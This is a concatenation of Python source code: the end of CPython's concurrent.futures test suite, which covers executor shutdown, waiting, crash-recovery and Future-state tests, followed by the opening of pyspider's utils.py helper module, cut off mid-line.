[self.executor.submit(time.sleep, 0.1) for _ in range(50)] self.executor.shutdown() for f in fs: f.result() class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase): def _prime_executor(self): pass def test_threads_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._threads), 3) self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: t.join() def test_thread_names_assigned(self): executor = futures.ThreadPoolExecutor( max_workers=5, thread_name_prefix='SpecialPool') executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: self.assertRegex(t.name, r'^SpecialPool_[0-4]$') t.join() def test_thread_names_default(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor test.support.gc_collect() for t in threads: # Ensure that our default name is reasonably sane and unique when # no thread_name_prefix was supplied. self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$') t.join() class ProcessPoolShutdownTest(ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes.values(): p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes.values(): p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes call_queue = executor._call_queue queue_management_thread = executor._queue_management_thread del executor test.support.gc_collect() # Make sure that all the executor resources were properly cleaned by # the shutdown process queue_management_thread.join() for p in processes.values(): p.join() call_queue.join_thread() create_executor_tests(ProcessPoolShutdownTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class WaitTests: def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1], return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 6) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase): def test_pending_calls_race(self): # Issue #14406: multi-threaded race condition when waiting on all # futures. event = threading.Event() def future_func(): event.wait() newgil = hasattr(sys, 'getswitchinterval') if newgil: geti, seti = sys.getswitchinterval, sys.setswitchinterval else: geti, seti = sys.getcheckinterval, sys.setcheckinterval oldinterval = geti() seti(1e-6 if newgil else 1) try: fs = {self.executor.submit(future_func) for i in range(100)} event.set() futures.wait(fs, return_when=futures.ALL_COMPLETED) finally: seti(oldinterval) create_executor_tests(WaitTests, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class AsCompletedTests: # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) def test_duplicate_futures(self): # Issue 20367. Duplicate futures should not raise exceptions or give # duplicate responses. # Issue #31641: accept arbitrary iterables. future1 = self.executor.submit(time.sleep, 2) completed = [ f for f in futures.as_completed(itertools.repeat(future1, 3)) ] self.assertEqual(len(completed), 1) def test_free_reference_yielded_future(self): # Issue #14406: Generator should not keep references # to finished futures. futures_list = [Future() for _ in range(8)] futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED)) futures_list.append(create_future(state=FINISHED, result=42)) with self.assertRaises(futures.TimeoutError): for future in futures.as_completed(futures_list, timeout=0): futures_list.remove(future) wr = weakref.ref(future) del future test.support.gc_collect() self.assertIsNone(wr()) futures_list[0].set_result("test") for future in futures.as_completed(futures_list): futures_list.remove(future) wr = weakref.ref(future) del future test.support.gc_collect() self.assertIsNone(wr()) if futures_list: futures_list[0].set_result("test") def test_correct_timeout_exception_msg(self): futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE, RUNNING_FUTURE, SUCCESSFUL_FUTURE] with self.assertRaises(futures.TimeoutError) as cm: list(futures.as_completed(futures_list, timeout=0)) self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished') create_executor_tests(AsCompletedTests) class ExecutorTest: # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) future = self.executor.submit(capture, 1, self=2, fn=3) self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3})) future = self.executor.submit(fn=capture, arg=1) self.assertEqual(future.result(), ((), {'arg': 1})) with self.assertRaises(TypeError): self.executor.submit(arg=1) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) self.assertEqual( list(self.executor.map(pow, range(10), range(10), chunksize=3)), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 6], timeout=5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) def test_shutdown_race_issue12456(self): # Issue #12456: race condition at shutdown where trying to post a # sentinel in the call queue blocks (the queue is full while processes # have exited). self.executor.map(str, [2] * (self.worker_count + 1)) self.executor.shutdown() @test.support.cpython_only def test_no_stale_references(self): # Issue #16284: check that the executors don't unnecessarily hang onto # references. my_object = MyObject() my_object_collected = threading.Event() my_object_callback = weakref.ref( my_object, lambda obj: my_object_collected.set()) # Deliberately discarding the future. self.executor.submit(my_object.my_method) del my_object collected = my_object_collected.wait(timeout=5.0) self.assertTrue(collected, "Stale reference not collected within timeout.") def test_max_workers_negative(self): for number in (0, -1): with self.assertRaisesRegex(ValueError, "max_workers must be greater " "than 0"): self.executor_type(max_workers=number) def test_free_reference(self): # Issue #14406: Result iterator should not keep an internal # reference to result objects. for obj in self.executor.map(make_dummy_object, range(10)): wr = weakref.ref(obj) del obj test.support.gc_collect() self.assertIsNone(wr()) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase): def test_map_submits_without_iteration(self): """Tests verifying issue 11777.""" finished = [] def record_finished(n): finished.append(n) self.executor.map(record_finished, range(10)) self.executor.shutdown(wait=True) self.assertCountEqual(finished, range(10)) def test_default_workers(self): executor = self.executor_type() self.assertEqual(executor._max_workers, (os.cpu_count() or 1) * 5) class ProcessPoolExecutorTest(ExecutorTest): @unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit') def test_max_workers_too_large(self): with self.assertRaisesRegex(ValueError, "max_workers must be <= 61"): futures.ProcessPoolExecutor(max_workers=62) def test_killed_child(self): # When a child process is abruptly terminated, the whole pool gets # "broken". futures = [self.executor.submit(time.sleep, 3)] # Get one of the processes, and terminate (kill) it p = next(iter(self.executor._processes.values())) p.terminate() for fut in futures: self.assertRaises(BrokenProcessPool, fut.result) # Submitting other jobs fails as well. self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8) def test_map_chunksize(self): def bad_map(): list(self.executor.map(pow, range(40), range(40), chunksize=-1)) ref = list(map(pow, range(40), range(40))) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=6)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=50)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=40)), ref) self.assertRaises(ValueError, bad_map) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. future = self.executor.submit(self._test_traceback) with self.assertRaises(Exception) as cm: future.result() exc = cm.exception self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), futures.process._RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with test.support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) def test_ressources_gced_in_workers(self): # Ensure that argument for a job are correctly gc-ed after the job # is finished mgr = get_context(self.ctx).Manager() obj = EventfulGCObj(mgr) future = self.executor.submit(id, obj) future.result() self.assertTrue(obj.event.wait(timeout=1)) # explicitly destroy the object to ensure that EventfulGCObj.__del__() # is called while manager is still running. obj = None test.support.gc_collect() mgr.shutdown() mgr.join() create_executor_tests(ProcessPoolExecutorTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) def hide_process_stderr(): import io sys.stderr = io.StringIO() def _crash(delay=None): """Induces a segfault.""" if delay: time.sleep(delay) import faulthandler faulthandler.disable() faulthandler._sigsegv() def _exit(): """Induces a sys exit with exitcode 1.""" sys.exit(1) def _raise_error(Err): """Function that raises an Exception in process.""" hide_process_stderr() raise Err() def _return_instance(cls): """Function that returns a instance of cls.""" hide_process_stderr() return cls() class CrashAtPickle(object): """Bad object that triggers a segfault at pickling time.""" def __reduce__(self): _crash() class CrashAtUnpickle(object): """Bad object that triggers a segfault at unpickling time.""" def __reduce__(self): return _crash, () class ExitAtPickle(object): """Bad object that triggers a process exit at pickling time.""" def __reduce__(self): _exit() class ExitAtUnpickle(object): """Bad object that triggers a process exit at unpickling time.""" def __reduce__(self): return _exit, () class ErrorAtPickle(object): """Bad object that triggers an error at pickling time.""" def __reduce__(self): from pickle import PicklingError raise PicklingError("Error in pickle") class ErrorAtUnpickle(object): """Bad object that triggers an error at unpickling time.""" def __reduce__(self): from pickle import UnpicklingError return _raise_error, (UnpicklingError, ) class ExecutorDeadlockTest: TIMEOUT = 15 @classmethod def _sleep_id(cls, x, delay): time.sleep(delay) return x def _fail_on_deadlock(self, executor): # If we did not recover before TIMEOUT seconds, consider that the # executor is in a deadlock state and forcefully clean all its # composants. import faulthandler from tempfile import TemporaryFile with TemporaryFile(mode="w+") as f: faulthandler.dump_traceback(file=f) f.seek(0) tb = f.read() for p in executor._processes.values(): p.terminate() # This should be safe to call executor.shutdown here as all possible # deadlocks should have been broken. executor.shutdown(wait=True) print(f"\nTraceback:\n {tb}", file=sys.__stderr__) self.fail(f"Executor deadlock:\n\n{tb}") def test_crash(self): # extensive testing for deadlock caused by crashes in a pool. self.executor.shutdown(wait=True) crash_cases = [ # Check problem occurring while pickling a task in # the task_handler thread (id, (ErrorAtPickle(),), PicklingError, "error at task pickle"), # Check problem occurring while unpickling a task on workers (id, (ExitAtUnpickle(),), BrokenProcessPool, "exit at task unpickle"), (id, (ErrorAtUnpickle(),), BrokenProcessPool, "error at task unpickle"), (id, (CrashAtUnpickle(),), BrokenProcessPool, "crash at task unpickle"), # Check problem occurring during func execution on workers (_crash, (), BrokenProcessPool, "crash during func execution on worker"), (_exit, (), SystemExit, "exit during func execution on worker"), (_raise_error, (RuntimeError, ), RuntimeError, "error during func execution on worker"), # Check problem occurring while pickling a task result # on workers (_return_instance, (CrashAtPickle,), BrokenProcessPool, "crash during result pickle on worker"), (_return_instance, (ExitAtPickle,), SystemExit, "exit during result pickle on worker"), (_return_instance, (ErrorAtPickle,), PicklingError, "error during result pickle on worker"), # Check problem occurring while unpickling a task in # the result_handler thread (_return_instance, (ErrorAtUnpickle,), BrokenProcessPool, "error during result unpickle in result_handler"), (_return_instance, (ExitAtUnpickle,), BrokenProcessPool, "exit during result unpickle in result_handler") ] for func, args, error, name in crash_cases: with self.subTest(name): # The captured_stderr reduces the noise in the test report with test.support.captured_stderr(): executor = self.executor_type( max_workers=2, mp_context=get_context(self.ctx)) res = executor.submit(func, *args) with self.assertRaises(error): try: res.result(timeout=self.TIMEOUT) except futures.TimeoutError: # If we did not recover before TIMEOUT seconds, # consider that the executor is in a deadlock state self._fail_on_deadlock(executor) executor.shutdown(wait=True) def test_shutdown_deadlock(self): # Test that the pool calling shutdown do not cause deadlock # if a worker fails after the shutdown call. self.executor.shutdown(wait=True) with self.executor_type(max_workers=2, mp_context=get_context(self.ctx)) as executor: self.executor = executor # Allow clean up in fail_on_deadlock f = executor.submit(_crash, delay=.1) executor.shutdown(wait=True) with self.assertRaises(BrokenProcessPool): f.result() create_executor_tests(ExecutorDeadlockTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class FutureTests(BaseTestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with test.support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_done_callback_raises_already_succeeded(self): with test.support.captured_stderr() as stderr: def raising_fn(callback_future): raise Exception('doh!') f = Future() # Set the result first to simulate a future that runs instantly, # effectively allowing the callback to be run immediately. f.set_result(5) f.add_done_callback(raising_fn) self.assertIn('exception calling callback for', stderr.getvalue()) self.assertIn('doh!', stderr.getvalue()) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised OSError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=OSError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) t.join() def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=5) t.join() def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), OSError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = OSError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=5), OSError)) t.join() @test.support.reap_threads def test_main(): try: test.support.run_unittest(__name__) finally: test.support.reap_children() multiprocessing.util._cleanup_tests() if __name__ == "__main__": test_main()
utils.py
#!/usr/bin/env python # -*- encoding: utf-8 -*- # vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8: # Author: Binux<i@binux.me> # http://binux.me # Created on 2012-11-06 11:50:13 import math import logging import hashlib import datetime import socket import base64 import warnings import threading from lxml.html import HtmlElement from pyquery import PyQuery from pyspider.database import connect_database import re import six from six import iteritems md5string = lambda x: hashlib.md5(utf8(x)).hexdigest() class ReadOnlyDict(dict): """A Read Only Dict""" def __setitem__(self, key, value): raise Exception("dict is read-only") def getitem(obj, key=0, default=None): """Get first element of list or return default""" try: return obj[key] except: return default def hide_me(tb, g=globals()): """Hide stack traceback of given stack""" base_tb = tb try: while tb and tb.tb_frame.f_globals is not g: tb = tb.tb_next while tb and tb.tb_frame.f_globals is g: tb = tb.tb_next except Exception as e: logging.exception(e) tb = base_tb if not tb: tb = base_tb return tb def run_in_thread(func, *args, **kwargs): """Run function in thread, return a Thread object""" from threading import Thread thread = Thread(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def run_in_subprocess(func, *args, **kwargs): """Run function in subprocess, return a Process object""" from multiprocessing import Process thread = Process(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False): """Formats the given date (which should be GMT). By default, we return a relative time (e.g., "2 minutes ago"). You can return an absolute date string with ``relative=False``. You can force a full format date ("July 10, 1980") with ``full_format=True``. This method is primarily intended for dates in the past. For dates in the future, we fall back to full format. From tornado """ if not date: return '-' if isinstance(date, float) or isinstance(date, int): date = datetime.datetime.utcfromtimestamp(date) now = datetime.datetime.utcnow() if date > now: if relative and (date - now).seconds < 60: # Due to click skew, things are some things slightly # in the future. Round timestamps in the immediate # future down to now in relative mode. date = now else: # Otherwise, future dates always use the full format. full_format = True local_date = date - datetime.timedelta(minutes=gmt_offset) local_now = now - datetime.timedelta(minutes=gmt_offset) local_yesterday = local_now - datetime.timedelta(hours=24) difference = now - date seconds = difference.seconds days = difference.days format = None if not full_format: ret_, fff_format = fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday) format = fff_format if ret_: return format else: format = format if format is None: format = "%(month_name)s %(day)s, %(year)s" if shorter else \ "%(month_name)s %(day)s, %(year)s at %(time)s" str_time = "%d:%02d" % (local_date.hour, local_date.minute) return format % { "month_name": local_date.strftime('%b'), "weekday": local_date.strftime('%A'), "day": str(local_date.day), "year": str(local_date.year), "month": local_date.month, "time": str_time } def fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday): if relative and days == 0: if seconds < 50: return True, (("1 second ago" if seconds <= 1 else "%(seconds)d seconds ago") % {"seconds": seconds}) if seconds < 50 * 60: minutes = round(seconds / 60.0) return True, (("1 minute ago" if minutes <= 1 else "%(minutes)d minutes ago") % {"minutes": minutes}) hours = round(seconds / (60.0 * 60)) return True, (("1 hour ago" if hours <= 1 else "%(hours)d hours ago") % {"hours": hours}) format = None if days == 0: format = "%(time)s" elif days == 1 and local_date.day == local_yesterday.day and \ relative: format = "yesterday" if shorter else "yesterday at %(time)s" elif days < 5: format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s" elif days < 334: # 11mo, since confusing for same month last year format = "%(month)s-%(day)s" if shorter else \ "%(month)s-%(day)s at %(time)s" return False, format class TimeoutError(Exception): pass try: import signal if not hasattr(signal, 'SIGALRM'): raise ImportError('signal') class timeout: """ Time limit of command with timeout(3): time.sleep(10) """ def __init__(self, seconds=1, error_message='Timeout'): self.seconds = seconds self.error_message = error_message def handle_timeout(self, signum, frame): raise TimeoutError(self.error_message) def __enter__(self): if not isinstance(threading.current_thread(), threading._MainThread): logging.warning("timeout only works on main thread, are you running pyspider in threads?") self.seconds = 0 if self.seconds: signal.signal(signal.SIGALRM, self.handle_timeout) signal.alarm(int(math.ceil(self.seconds))) def __exit__(self, type, value, traceback): if self.seconds: signal.alarm(0) except ImportError as e: warnings.warn("timeout is not supported on your platform.", FutureWarning) class timeout: """ Time limit of command (for windows) """ def __init__(self, seconds=1, error_message='Timeout'): pass def __enter__(self): pass def __exit__(self, type, value, traceback): pass def utf8(string): """ Make sure string is utf8 encoded bytes. If parameter is a object, object.__str__ will been called before encode as bytes """ if isinstance(string, six.text_type): return string.encode('utf8') elif isinstance(string, six.binary_type): return string else: return six.text_type(string).encode('utf8') def text(string, encoding='utf8'): """ Make sure string is unicode type, decode with given encoding if it's not. If parameter is a object, object.__str__ will been called """ if isinstance(string, six.text_type): return string elif isinstance(string, six.binary_type): return string.decode(encoding) else: return six.text_type(string) def pretty_unicode(string): """ Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed. """ if isinstance(string, six.text_type): return string try: return string.decode("utf8") except UnicodeDecodeError: return string.decode('Latin-1').encode('unicode_escape').decode("utf8") def unicode_string(string): """ Make sure string is unicode, try to default with utf8, or base64 if failed. can been decode by `decode_unicode_string` """ if isinstance(string, six.text_type): return string try: return string.decode("utf8") except UnicodeDecodeError: return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]' def unicode_dict(_dict): """ Make sure keys and values of dict is unicode. """ r = {} for k, v in iteritems(_dict): r[unicode_obj(k)] = unicode_obj(v) return r def unicode_list(_list): """ Make sure every element in list is unicode. bytes will encode in base64 """ return [unicode_obj(x) for x in _list] def unicode_obj(obj): """ Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64. Can been decode by `decode_unicode_obj` """ if isinstance(obj, dict): return unicode_dict(obj) elif isinstance(obj, (list, tuple)): return unicode_list(obj) elif isinstance(obj, six.string_types): return unicode_string(obj) elif isinstance(obj, (int, float)): return obj elif obj is None: return obj else: try: return text(obj) except: return text(repr(obj)) def decode_unicode_string(string): """ Decode string encoded by `unicode_string` """ if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'): return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')]) return string def decode_unicode_obj(obj): """ Decode unicoded dict/list/tuple encoded by `unicode_obj` """ if isinstance(obj, dict): r = {} for k, v in iteritems(obj): r[decode_unicode_string(k)] = decode_unicode_obj(v) return r elif isinstance(obj, six.string_types): return decode_unicode_string(obj) elif isinstance(obj, (list, tuple)): return [decode_unicode_obj(x) for x in obj] else: return obj class Get(object): """ Lazy value calculate for object """ def __init__(self, getter): self.getter = getter def __get__(self, instance, owner): return self.getter() class ObjectDict(dict): """ Object like dict, every dict[key] can visite by dict.key If dict[key] is `Get`, calculate it's value. """ def __getattr__(self, name): ret = self.__getitem__(name) if hasattr(ret, '__get__'): return ret.__get__(self, ObjectDict) return ret def load_object(name): """Load object from module""" if "." not in name: raise Exception('load object need module.object') module_name, object_name = name.rsplit('.', 1) if six.PY2: module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1) else: module = __import__(module_name, globals(), locals(), [object_name]) return getattr(module, object_name) def get_python_console(namespace=None): """ Return a interactive python console instance with caller's stack """ if namespace is None: import inspect frame = inspect.currentframe() caller = frame.f_back if not caller: logging.error("can't find caller who start this console.") caller = frame namespace = dict(caller.f_globals) namespace.update(caller.f_locals) try: from IPython.terminal.interactiveshell import TerminalInteractiveShell shell = TerminalInteractiveShell(user_ns=namespace) except ImportError: try: import readline import 